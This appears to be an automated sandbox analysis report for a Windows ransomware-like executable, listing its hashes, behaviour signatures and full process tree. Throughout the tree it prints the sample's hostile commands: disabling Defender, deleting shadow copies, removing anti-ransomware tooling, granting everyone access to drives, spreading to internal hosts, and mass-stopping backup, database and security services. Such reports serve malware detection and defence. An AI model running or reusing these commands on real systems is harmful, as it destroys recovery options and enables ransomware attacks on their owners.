Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
23-03-2021 18:12
General
-
Target
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
-
Size
368KB
-
MD5
2a6f56addd8adcbb1a6cc8e1d6090012
-
SHA1
03227744a280d56267cbef448f7e54a924f46173
-
SHA256
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554
-
SHA512
63d951d531ac8c9be311a73ab3c70f3b0afe77a71bbc949ede5564bc98de523bc324c926cb9d4a49dd25171f62333e645e4a56d9e2b4cceab3976672a4eba2c0
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 6 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 5 IoCs
-
Modifies file permissions 1 TTPs 3 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 57 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"1⤵
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start SSDPSRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start upnphost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start Dnscache /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start FDResPub /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\C63D4771-36BD-4704-AB63-F5904C2996D3\dismhost.exeC:\Users\Admin\AppData\Local\Temp\C63D4771-36BD-4704-AB63-F5904C2996D3\dismhost.exe {C3EB567D-3F9B-4975-93C0-E14E5E61625C}3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c net view2⤵
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.872⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe"C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe" \\10.10.0.87 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe"C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe" \\10.10.0.84 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe"C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe" \\10.10.0.77 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe"C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe" \\10.10.0.72 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.722⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.772⤵
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.702⤵
-
-
C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe"C:\Users\Admin\AppData\Local\Temp\oerdk2ed.exe" \\10.10.0.73 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.732⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.842⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.732⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.722⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SamSs /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop UI0Detect /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SstpSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SMTPSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DCAgent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AVP /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Antivirus /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ARSM /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop W3Svc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.772⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mozyprobackup /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop POP3Svc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop vapiendpoint /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop WRSVC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKey /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop tmlisten /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLBrowser /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TmCCSF /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update_64 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_service /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_filter /y2⤵
-
-
